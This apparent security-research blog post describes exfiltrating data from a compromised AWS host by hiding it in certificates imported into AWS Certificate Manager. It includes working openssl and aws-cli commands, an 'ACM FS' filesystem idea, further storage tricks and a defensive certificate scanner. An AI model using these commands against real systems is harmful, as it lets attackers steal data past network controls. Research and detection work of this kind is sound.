One of my hobbies is researching covert exfiltration mechanisms that use public cloud services.¹

At its core, public cloud exposes most service endpoints on the internet. If all you need is a bit of compute talking to some storage, you'd rather not involve the internet at all.



Enter private endpoints: VPC-only access to managed services. On AWS, you can attach endpoint policies to some of them so that only your accounts and networks can use them. But not every service supports VPC endpoints.

Let's take AWS Certificate Manager (ACM) as an example, since it doesn't have a VPC endpoint. Issuing or importing a certificate for use by other services, such as Elastic Load Balancing, requires ACM.

Two premises follow:

- You need to involve the internet to use ACM.

- If an attacker compromises a host that can reach ACM's public endpoint (and that's a big if), they can call ACM in their own account with their own credentials: a Bring Your Own Credentials (BYOC) attack.²

The problem with AWS services that don't have VPC endpoints or VPC endpoint policies is that they cannot be configured to prevent BYOC attacks. Building a data perimeter on AWS and routing traffic through a proxy doesn't solve this either, because the service itself has to be allowed.

The attacker's challenge is that even if they manage to mount a BYOC attack, they won't necessarily have access to a storage service like S3. They're limited to exfiltrating certificates.

Out of the box, ACM does not give an attacker a service that can be used to exfiltrate data.

So how do you exfiltrate arbitrary data when all you've got is a certificate manager?

Hello X.509, my old friend

We can build a message queue out of anything.³

The ACM API is fairly straightforward.

Asking AWS to generate a certificate doesn't leave much room for data. A Subject Alternative Name (SAN) extension allows up to 100 names, each limited to 253 octets. That's about 25 KB.

However, ACM also lets you import certificates, including a certificate chain of up to 2,097,152 bytes.⁴ That's 2 MB of data per certificate, and we can import about 5,000 certificates a year.
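As a rough sanity check, the capacity figures can be reproduced in a few lines of Python. This is a back-of-the-envelope sketch that only uses the limits quoted above (100 SANs of 253 octets, a 2,097,152-byte chain, 5,000 imports a year) and ignores DER and PEM framing, so real payload sizes will be somewhat lower. It also shows what happens when the data is base64-encoded twice, which is the case when the payload is base64-encoded into nsComment and the resulting certificate is base64-encoded again as PEM.

```python
"""Back-of-the-envelope ACM storage capacity, using the limits quoted in the text."""

SAN_NAMES = 100              # max Subject Alternative Names per requested certificate
SAN_NAME_OCTETS = 253        # max length of each name
CHAIN_LIMIT = 2_097_152      # max CertificateChain size in bytes (2 MiB)
IMPORTS_PER_YEAR = 5_000     # imported certificates per 365 days, as quoted above


def base64_payload(encoded_bytes: int, layers: int = 1) -> int:
    """Raw bytes that fit in `encoded_bytes` after `layers` rounds of base64.

    Base64 maps every 3 raw bytes to 4 encoded characters; framing
    (DER headers, PEM line breaks) is ignored here.
    """
    for _ in range(layers):
        encoded_bytes = encoded_bytes * 3 // 4
    return encoded_bytes


san_capacity = SAN_NAMES * SAN_NAME_OCTETS
raw_per_year = CHAIN_LIMIT * IMPORTS_PER_YEAR
one_layer_per_year = base64_payload(CHAIN_LIMIT, layers=1) * IMPORTS_PER_YEAR
two_layers_per_year = base64_payload(CHAIN_LIMIT, layers=2) * IMPORTS_PER_YEAR

if __name__ == "__main__":
    print(f"SAN request capacity: {san_capacity:,} bytes")
    print(f"Raw chain capacity:   {raw_per_year / 1e9:.2f} GB/year")
    print(f"One base64 layer:     {one_layer_per_year / 1e9:.2f} GB/year")
    print(f"Two base64 layers:    {two_layers_per_year / 1e9:.2f} GB/year")
```

Running it prints 25,300 bytes for the SAN route, 10.49 GB of raw chain capacity, 7.86 GB after one base64 layer and 5.90 GB after two. The single-layer figure is in the same ballpark as the 7.5 GB quoted for ACM FS; with both layers in play, the usable total is closer to 6 GB.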

Now we need to craft a valid X.509 certificate. We'll use the nsComment (Netscape Comment) extension. It's a legacy, non-standard extension, but it's free-form text with no length limit.

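```shell
# ourb64encoded.data must hold the base64 payload on a single line
# (e.g. produced with GNU `base64 -w0`); a wrapped file breaks the config.
cat > ext.cnf <<EOF
[v3_ext]
nsComment = $(cat ourb64encoded.data)
EOF
```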

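Nothing else about the certificates matters at this point, so we create a key and a self-signed leaf certificate, plus a separate self-signed "CA" certificate that carries the payload and serves as our chain.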

```shell
openssl req -newkey rsa:2048 -nodes \
  -subj "/CN=leaf" -keyout key.pem -out leaf.csr
openssl x509 -req -days 1 -in leaf.csr -signkey key.pem -out cert.pem

openssl req -new -newkey rsa:2048 -nodes \
  -subj "/CN=payload-carrier-CA" -keyout ca_key.pem -out ca.csr
openssl x509 -req -days 365 -in ca.csr -signkey ca_key.pem \
  -extfile ext.cnf -extensions v3_ext -out chain.pem
```

Our payload now sits in chain.pem.

Next, we import everything into ACM:

```shell
aws acm import-certificate \
  --certificate fileb://cert.pem \
  --private-key fileb://key.pem \
  --certificate-chain fileb://chain.pem \
  --output json > importresp
```

We now have our data in ACM. To get it back, we call `get-certificate`.

Keep importresp handy, as it contains the ARN of our certificate.

```shell
aws acm get-certificate --certificate-arn "$(jq -r '.CertificateArn' importresp)" \
  | jq -r '.CertificateChain' > out.pem
# Line 2 of the -ext output holds the value, indented by four spaces.
openssl x509 -in out.pem -noout -ext nsComment | awk 'NR==2' | tail -c +5 | base64 -d > ourb64encoded.data2
```

There's our data! Now let's look at what CloudTrail recorded for the import:

```json
{
  "eventVersion": "1.11",
  "userIdentity": {
    "type": "IAMUser",
    "principalId": "AIDAWXXXXXXX",
    "arn": "arn:aws:iam::0123456789012:user/woot",
    "accountId": "0123456789012",
    "accessKeyId": "AKIAXXXXXXX",
    "userName": "woot"
  },
  "eventTime": "2025-08-05T2:16:39Z",
  "eventSource": "acm.amazonaws.com",
  "eventName": "ImportCertificate",
  "awsRegion": "eu-west-1",
  "sourceIPAddress": "sourceIPAddress",
  "userAgent": "Boto3/1.39.3 md/Botocore#1.39.3 ua/2.1 os/linux#6.8.0-65-generic md/arch#x86_64 lang/python#3.10.12 md/pyimpl#CPython m/b,D,Z cfg/retry-mode#legacy Botocore/1.39.3",
  "requestParameters": {
    "reason": "requestParameters too large",
    "omitted": "true",
    "originalSize": "4642657"
  },
  "responseElements": {
    "certificateArn": "arn:aws:acm:eu-west-1:0123456789012:certificate/56af65b9-7677-37cb-9385-7317bc1e6e3b"
  },
  "requestID": "someuuid",
  "eventID": "anotheruuid",
  "readOnly": false,
  "eventType": "AwsApiCall",
  "managementEvent": true,
  "recipientAccountId": "0123456789012",
  "eventCategory": "Management",
  "tlsDetails": {
    "tlsVersion": "TLSv1.3",
    "cipherSuite": "TLS_AES_128_GCM_SHA256",
    "clientProvidedHostHeader": "acm.eu-west-1.amazonaws.com"
  }
}
```

Because the request parameters are too large, CloudTrail omits them, so as it stands, this method can only be detected with a TLS-intercepting proxy. In other words, our egress filter would need to unpack each imported certificate and scan it.
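To make "unpack each imported certificate and scan it" concrete, here is a minimal Python sketch of the scanning half of such a filter. It assumes the intercepting proxy has already decrypted the ImportCertificate request and extracted the certificate chain as PEM text; `scan_chain` and the 16 KiB threshold are hypothetical choices for illustration, not part of any product. It flags certificates that carry the nsComment OID (2.16.840.1.113730.1.13) or whose DER encoding is unusually large. It uses a plain byte search instead of a full ASN.1 parser, so treat it as a heuristic.

```python
import base64
import re

# DER encoding of OID 2.16.840.1.113730.1.13 (Netscape Comment, "nsComment").
NS_COMMENT_OID = bytes.fromhex("06096086480186f842010d")

# Matches each PEM certificate block in a chain.
PEM_CERT_RE = re.compile(
    r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", re.DOTALL
)

# Hypothetical threshold: ordinary certificates are a few KB of DER at most.
DEFAULT_MAX_DER_BYTES = 16 * 1024


def scan_chain(pem_text: str, max_der_bytes: int = DEFAULT_MAX_DER_BYTES) -> list[dict]:
    """Return one finding per certificate in a PEM chain (heuristic, not a parser)."""
    findings = []
    for index, match in enumerate(PEM_CERT_RE.finditer(pem_text)):
        # Drop PEM line breaks and whitespace, then decode back to DER bytes.
        der = base64.b64decode("".join(match.group(1).split()))
        has_ns_comment = NS_COMMENT_OID in der
        findings.append(
            {
                "index": index,
                "der_bytes": len(der),
                "has_ns_comment": has_ns_comment,
                "suspicious": has_ns_comment or len(der) > max_der_bytes,
            }
        )
    return findings
```

A real filter would parse the certificates with a proper X.509 library and tune the threshold against legitimate traffic; the byte search only shows where the signal lives.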

FUSE

Possibly entering the realm of cursed engineering: instead of scripting it, we can turn it into a userspace filesystem.

Introducing ACM FS: secure-by-default, HSM-backed storage capable of holding up to 7.5 GB.⁵

It can't do paths, but it can split bigger files⁶ across multiple certificates, and it has a cache!

You can find an implementation here.⁷

On "free" storage

A similar principle exists with AWS IAM and SAML certificates. AWS IAM supports a VPC endpoint only in the us-east-1 region. Using SAML provider metadata, you can store up to 10 MB per identity provider. There does not appear to be a hard limit on the number of identity providers, which could theoretically allow for very large total storage. A similar approach might be possible with an embedded X.509 certificate.

When it comes to storage, honourable mention goes to AWS Lambda, with 50 MB per function and a total of 75 GB. In theory, you could embed data within a Python file (for example, inside a multi-line comment) and upload it using CreateFunction.

API Gateway allows up to 6 MB in ImportRestApi, so you might be able to include unusually long descriptions in certain properties.

The world is your oyster - but this is purely a technical observation, not a recommendation.

¹ Disclaimer: This information is provided for educational and illustrative purposes only. Do not attempt, replicate, or apply any of these techniques in real systems. Doing so may violate terms of service, end-user license agreements, or applicable laws. I take no responsibility whatsoever for any actions you take or consequences you incur. Proceeding with such activities could result in account suspension, legal action, or other serious repercussions.

² This is not an AWS vulnerability. The security of customer-owned EC2 instances falls on the customer's side of the shared responsibility model.

³ What should probably be called Xe's law: https://xeiaso.net/blog/anything-message-queue/

⁴ I don't know why it's 2^21 bytes.

⁵ Base64 inflates data by a third, so only about three quarters of each 2 MB chain is payload. The figure assumes the theoretical 5,000 certificates.

⁶ But I haven't really tested this.

⁷ fusepy is a fantastic project.